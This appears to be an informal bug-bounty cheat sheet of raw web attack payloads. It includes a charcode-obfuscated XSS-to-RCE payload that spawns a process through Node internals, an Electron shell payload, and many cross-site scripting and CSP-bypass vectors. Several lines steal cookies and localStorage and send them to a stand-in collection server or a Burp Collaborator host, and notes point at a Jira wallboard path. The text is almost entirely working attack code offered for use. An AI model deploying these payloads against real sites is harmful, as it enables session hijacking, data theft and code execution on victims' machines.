xss to rce payload:
">'><img src=x onerror=writeln(String.fromCharCode(60,115,99,114,105,112,116,62,10,118,97,114,32,80,114,111,99,101,115,115,32,61,32,112,114,111,99,101,115,115,46,98,105,110,100,105,110,103,40,39,112,114,111,99,101,115,115,95,119,114,97,112,39,41,46,80,114,111,99,101,115,115,59,10,118,97,114,32,112,114,111,99,32,61,32,110,101,119,32,80,114,111,99,101,115,115,40,41,59,10,112,114,111,99,46,111,110,101,120,105,116,32,61,32,102,117,110,99,116,105,111,110,40,97,44,98,41,32,123,125,59,10,118,97,114,32,101,110,118,32,61,32,112,114,111,99,101,115,115,46,101,110,118,59,10,118,97,114,32,101,110,118,95,32,61,32,91,93,59,10,102,111,114,32,40,118,97,114,32,107,101,121,32,105,110,32,101,110,118,41,32,101,110,118,95,46,112,117,115,104,40,107,101,121,43,39,61,39,43,101,110,118,91,107,101,121,93,41,59,10,112,114,111,99,46,115,112,97,119,110,40,123,102,105,108,101,58,39,47,117,115,114,47,98,105,110,47,103,110,111,109,101,45,99,97,108,99,117,108,97,116,111,114,39,44,99,119,100,58,110,117,108,108,44,119,105,110,100,111,119,115,86,101,114,98,97,116,105,109,65,114,103,117,109,101,110,116,115,58,102,97,108,115,101,44,100,101,116,97,99,104,101,100,58,102,97,108,115,101,44,101,110,118,80,97,105,114,115,58,101,110,118,95,44,115,116,100,105,111,58,91,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,93,125,41,59,10,60,47,115,99,114,105,112,116,62))>
same rce
<a onmouseover="try{ const {shell} = require('electron'); shell.openExternal('file:C:/Windows/System32/calc.exe') }catch(e){alert(e)}">Harmless Link</a>
<script+class=whoami>window.open("Calculator:///");</script>
jira xss bug: check wallboard in recorn
victomhost/plugins/servlet/Wallboard
saki'"><svg><animatetransform src=x onbegin=alert(1)>
'"><svg><animate onbegin=alert(document.domain) attributeName=x></svg>
<math href="javascript:alert(document.cookie)">CLICKME</math>
script><svg/onload=prompt`{document.cookie}`>
html injection:
</h1><h3><mark><a href="https://example.com">e x a m p l e . c o m </a></mark></h3>
<a href=[0x0b]xss" onfocus=prompt(1) autofocus fragment="
Bug Bounty Tips:
Here is An XSS payload that steals both Cookies and Local Storage Data:
<svg/onload='const url = `https://yourserver/collect?cookie=${encodeURIComponent(document.cookie)}&localStorage=${encodeURIComponent(JSON.stringify(localStorage))}`; fetch(url);'>"
Bug: XSS to information Disclosure.
I have used double URL encoded version of this payload:
<img src="x" onerror="fetch('http://yourserver/?cookie=' + encodeURIComponent(document.cookie));">
CSP BYPASS:
%3C/script%20%3E
2- mitsecXSS%22%3E%3Cinput%20%00%20onControl%20hello%20oninput=confirm(1)%20x%3E
challenge-0622.intigriti.io/challenge/index.php
'">👉<a/href='jav	ascript:throw/lauritz/'>click<!--
<a/href=”javascript:alert(document.cookie)”>ClickMe
‘“><img src=x onerror=fetch(‘//ra54f7ltuq8q8i7ym90odj9zgqmga5.burpcollaborator.net/?c=’%2Bdocument.cookie)>
?url=http://me6.com/aem/xss2.svg
my fav bypass XSS payload is: 99% work
'"()%26%25<yes><%2Fscript><script>alert(document.c00kiE)<%2Fscript>